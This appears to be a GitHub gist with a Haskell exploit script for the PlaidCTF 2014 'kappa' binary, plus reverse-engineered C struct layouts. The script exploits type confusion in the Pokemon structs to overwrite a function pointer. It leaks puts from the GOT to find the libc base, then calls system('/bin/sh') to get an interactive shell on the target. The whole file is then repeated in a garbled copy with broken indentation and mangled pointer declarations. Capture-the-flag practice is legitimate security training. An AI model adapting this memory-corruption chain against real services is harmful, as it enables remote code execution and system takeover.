Tosainu/exploit.hs

## exploit.hs
#!/usr/bin/env stack
-- stack --stack-yaml ./stack.yaml runghc --package pwn

-- PlaidCTF 2014: kappa
-- https://github.com/ctfs/write-ups-2014/tree/master/plaid-ctf-2014/kappa

-- tested env:
-- $ cat /etc/os-release
-- NAME="Ubuntu"
-- VERSION="16.04.3 LTS (Xenial Xerus)"
-- ...
--
-- $ sha1sum /lib/i386-linux-gnu/libc.so.6
-- 4fbb4b71ac6585eb0fa8f60b902a39f29da3fd34  /lib/i386-linux-gnu/libc.so.6

{-# LANGUAGE OverloadedStrings #-}

import           Control.Monad
import           Data.Bits
import qualified Data.ByteString.Char8 as BS
import           Data.Maybe
import           Data.Monoid           ((<>))
import           Numeric               (showHex)

-- https://github.com/Tosainu/pwn.hs
import           Pwn

main :: IO ()
main = do
  r <- remote "192.168.122.10" 4000

  info "find Kakuna x4"
  forM_ ["foo", "bar", "baz", "qux"] $ \name -> do
    recvuntil r "5. Change Pokemon artwork\n\n"
    sendline r "1"        -- 1. Go into the Grass

    recvuntil r "5. Change Pokemon artwork\n\n"
    sendline r "1"        -- 1. Go into the Grass
    recvuntil r "3. Run\n"
    sendline r "2"        -- 2. Throw Pokeball
    recvuntil r "What would you like to name this Pokemon?\n"
    send r name
    success $ "  caught a Kakuna: " <> BS.unpack name

  info "release 1st Kakuna"
  recvuntil r "5. Change Pokemon artwork\n\n"
  sendline r "4"        -- 4. Release a Pokemon
  recvuntil r "5. qux\n"
  sendline r "2"

  -- Pokemon list: ["Bird Jesus", "bar", "baz", "qux", "qux"]
  --                                              ↑

  info "find Kakuna"
  recvuntil r "5. Change Pokemon artwork\n\n"
  sendline r "1"        -- 1. Go into the Grass

  recvuntil r "5. Change Pokemon artwork\n\n"
  sendline r "1"        -- 1. Go into the Grass
  -- A wild Kakuna appears!
  recvuntil r "3. Run\n"
  sendline r "2"        -- 2. Throw Pokeball
  recvuntil r "What would you like to name this Pokemon?\n"
  send r "foo2"
  recvuntil r "5. qux\n"
  sendline r "5"
  success "  caught a Kakuna: foo2"

  info "find Charizard"
  recvuntil r "5. Change Pokemon artwork\n\n"
  sendline r "1"        -- 1. Go into the Grass

  recvuntil r "5. Change Pokemon artwork\n\n"
  sendline r "1"        -- 1. Go into the Grass
  -- A wild Kakuna appears!
  recvuntil r "3. Run\n"
  sendline r "3"        -- 3. Run
  info "  found a Kakuna but released it"

  recvuntil r "5. Change Pokemon artwork\n\n"
  sendline r "1"        -- 1. Go into the Grass
  replicateM_ 4 $ do
    recvuntil r "3. Run\n"
    sendline r "1"        -- 1. Attack
  recvuntil r "3. Run\n"
  sendline r "2"        -- 2. Throw Pokeball
  recvuntil r "What would you like to name this Pokemon?\n"
  send r "/bin/sh\x00"
  recvuntil r "5. foo2\n"
  sendline r "5"
  success "  caught a Charizard: /bin/sh"

  info "leak informations"
  -- [0x08049284]> pd 3 @ sym.imp.puts
  -- ┌ (fcn) sym.imp.puts 6
  -- │   sym.imp.puts ();
  -- │       |   0x08048590      ff25d4ae0408   jmp dword [reloc.puts_212]  ; 0x804aed4
  --         |   0x08048596      6840000000     push 0x40                   ; '@' ; '@'
  --         └─< 0x0804859b      e960ffffff     jmp 0x8048500               ; fcn.80484fe+0x2
  let puts_got_ptr      = 0x08048592
      print_kakuna_info = 0x08048766

      libc_puts'   = 0x0005fca0
      libc_system' = 0x0003ada0

      buf = BS.concat $ catMaybes
            [ Just $ BS.replicate 0x1f5 'A'
            , p32 0xdeadbeef        -- health
            , p32 0xdeadbeef        -- power
            , p32 puts_got_ptr      -- attack
            , p32 print_kakuna_info -- print_info
            ]
  recvuntil r "5. Change Pokemon artwork\n\n"
  sendline r "5"        -- 5. Change Pokemon artwork
  recvuntil r "5. /bin/sh\n"
  sendline r "5"
  send r $ buf <> BS.replicate (0x850 - BS.length buf) 'A'

  recvuntil r "5. Change Pokemon artwork\n\n"
  sendline r "3"        -- 3. Inpect your Pokemon
  recvuntil r "Name: /bin/sh\n"
  recvuntil r "Attack: "
  leak <- recvn r 4
  let Just libc_puts = u32 leak
      libc_base      = libc_puts - libc_puts'

  success $ "  libc_base: 0x" <> showHex libc_base ""

  info "execute '/bin/sh'"
  let buf = BS.concat $ catMaybes
            [ Just $ BS.replicate 0x1f5 'A'
            , p32 0xdeadbeef    -- health
            , p32 0xdeadbeef    -- power
            , p32 0xdeadbeef    -- attack
            , p32 $ libc_base + libc_system'  -- print_info
            ]
  recvuntil r "5. Change Pokemon artwork\n\n"
  sendline r "5"        -- 5. Change Pokemon artwork
  recvuntil r "5. /bin/sh\n"
  sendline r "5"
  send r $ buf <> BS.replicate (0x850 - BS.length buf) 'A'

  recvuntil r "5. Change Pokemon artwork\n\n"
  sendline r "3"        -- 3. Inpect your Pokemon
  recvuntil r "Name: baz\n"
  recvuntil r "Attack: Tackle\n"

  interactive r

## struct.c
void*     pokemons[5];
uint32_t  pokemon_types[5];

struct pokemon1 {
  char name[0xf];       // +0x000   "Charizard"
  char artwork[0x868];  // strln(buf) == 0x850
  uint32_t health;      // +0x878   0x64
  uint32_t power;       // +0x87c   0xa
  char** attack;        // +0x880   "Blaze"
  void(*print_info)(struct pokemon1*);     // +0x884
};

struct pokemon2 {
  char name[0xf];       // +0x000   "Kakuna"
  char artwork[0x1f4];
  uint32_t health;      // +0x204   0x14
  uint32_t power;       // +0x208   0x1
  char** attack;        // +0x20c   "Tackle"
  void(*print_info)(struct pokemon2*);     // +0x210
};

struct pokemon3 {
  char name[0xf];       // +0x000   "Birt Jesus"
  char artwork[0x5dc];
  uint32_t health;      // +0x5ec   0x3e8
  uint32_t power;       // +0x5f0   0x14
  char** attack;        // +0x5f4   "Gust"
  void(*print_info)(struct pokemon3*);     // +0x5f8
};


// -------------------------------------------------------

0x080491b9: UAF?
	#!/usr/bin/env stack
	-- stack --stack-yaml ./stack.yaml runghc --package pwn

	-- PlaidCTF 2014: kappa
	-- https://github.com/ctfs/write-ups-2014/tree/master/plaid-ctf-2014/kappa

	-- tested env:
	-- $ cat /etc/os-release
	-- NAME="Ubuntu"
	-- VERSION="16.04.3 LTS (Xenial Xerus)"
	-- ...
	--
	-- $ sha1sum /lib/i386-linux-gnu/libc.so.6
	-- 4fbb4b71ac6585eb0fa8f60b902a39f29da3fd34 /lib/i386-linux-gnu/libc.so.6

	{-# LANGUAGE OverloadedStrings #-}

	import Control.Monad
	import Data.Bits
	import qualified Data.ByteString.Char8 as BS
	import Data.Maybe
	import Data.Monoid ((<>))
	import Numeric (showHex)

	-- https://github.com/Tosainu/pwn.hs
	import Pwn

	main :: IO ()
	main = do
	r <- remote "192.168.122.10" 4000

	info "find Kakuna x4"
	forM_ ["foo", "bar", "baz", "qux"] $ \name -> do
	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "1" -- 1. Go into the Grass

	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "1" -- 1. Go into the Grass
	recvuntil r "3. Run\n"
	sendline r "2" -- 2. Throw Pokeball
	recvuntil r "What would you like to name this Pokemon?\n"
	send r name
	success $ " caught a Kakuna: " <> BS.unpack name

	info "release 1st Kakuna"
	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "4" -- 4. Release a Pokemon
	recvuntil r "5. qux\n"
	sendline r "2"

	-- Pokemon list: ["Bird Jesus", "bar", "baz", "qux", "qux"]
	-- ↑

	info "find Kakuna"
	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "1" -- 1. Go into the Grass

	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "1" -- 1. Go into the Grass
	-- A wild Kakuna appears!
	recvuntil r "3. Run\n"
	sendline r "2" -- 2. Throw Pokeball
	recvuntil r "What would you like to name this Pokemon?\n"
	send r "foo2"
	recvuntil r "5. qux\n"
	sendline r "5"
	success " caught a Kakuna: foo2"

	info "find Charizard"
	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "1" -- 1. Go into the Grass

	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "1" -- 1. Go into the Grass
	-- A wild Kakuna appears!
	recvuntil r "3. Run\n"
	sendline r "3" -- 3. Run
	info " found a Kakuna but released it"

	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "1" -- 1. Go into the Grass
	replicateM_ 4 $ do
	recvuntil r "3. Run\n"
	sendline r "1" -- 1. Attack
	recvuntil r "3. Run\n"
	sendline r "2" -- 2. Throw Pokeball
	recvuntil r "What would you like to name this Pokemon?\n"
	send r "/bin/sh\x00"
	recvuntil r "5. foo2\n"
	sendline r "5"
	success " caught a Charizard: /bin/sh"

	info "leak informations"
	-- [0x08049284]> pd 3 @ sym.imp.puts
	-- ┌ (fcn) sym.imp.puts 6
	-- │ sym.imp.puts ();
	-- │ \| 0x08048590 ff25d4ae0408 jmp dword [reloc.puts_212] ; 0x804aed4
	-- \| 0x08048596 6840000000 push 0x40 ; '@' ; '@'
	-- └─< 0x0804859b e960ffffff jmp 0x8048500 ; fcn.80484fe+0x2
	let puts_got_ptr = 0x08048592
	print_kakuna_info = 0x08048766

	libc_puts' = 0x0005fca0
	libc_system' = 0x0003ada0

	buf = BS.concat $ catMaybes
	[ Just $ BS.replicate 0x1f5 'A'
	, p32 0xdeadbeef -- health
	, p32 0xdeadbeef -- power
	, p32 puts_got_ptr -- attack
	, p32 print_kakuna_info -- print_info
	]
	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "5" -- 5. Change Pokemon artwork
	recvuntil r "5. /bin/sh\n"
	sendline r "5"
	send r $ buf <> BS.replicate (0x850 - BS.length buf) 'A'

	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "3" -- 3. Inpect your Pokemon
	recvuntil r "Name: /bin/sh\n"
	recvuntil r "Attack: "
	leak <- recvn r 4
	let Just libc_puts = u32 leak
	libc_base = libc_puts - libc_puts'

	success $ " libc_base: 0x" <> showHex libc_base ""

	info "execute '/bin/sh'"
	let buf = BS.concat $ catMaybes
	[ Just $ BS.replicate 0x1f5 'A'
	, p32 0xdeadbeef -- health
	, p32 0xdeadbeef -- power
	, p32 0xdeadbeef -- attack
	, p32 $ libc_base + libc_system' -- print_info
	]
	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "5" -- 5. Change Pokemon artwork
	recvuntil r "5. /bin/sh\n"
	sendline r "5"
	send r $ buf <> BS.replicate (0x850 - BS.length buf) 'A'

	recvuntil r "5. Change Pokemon artwork\n\n"
	sendline r "3" -- 3. Inpect your Pokemon
	recvuntil r "Name: baz\n"
	recvuntil r "Attack: Tackle\n"

	interactive r
	void* pokemons[5];
	uint32_t pokemon_types[5];

	struct pokemon1 {
	char name[0xf]; // +0x000 "Charizard"
	char artwork[0x868]; // strln(buf) == 0x850
	uint32_t health; // +0x878 0x64
	uint32_t power; // +0x87c 0xa
	char** attack; // +0x880 "Blaze"
	void(print_info)(struct pokemon1); // +0x884
	};

	struct pokemon2 {
	char name[0xf]; // +0x000 "Kakuna"
	char artwork[0x1f4];
	uint32_t health; // +0x204 0x14
	uint32_t power; // +0x208 0x1
	char** attack; // +0x20c "Tackle"
	void(print_info)(struct pokemon2); // +0x210
	};

	struct pokemon3 {
	char name[0xf]; // +0x000 "Birt Jesus"
	char artwork[0x5dc];
	uint32_t health; // +0x5ec 0x3e8
	uint32_t power; // +0x5f0 0x14
	char** attack; // +0x5f4 "Gust"
	void(print_info)(struct pokemon3); // +0x5f8
	};


	// -------------------------------------------------------

	0x080491b9: UAF?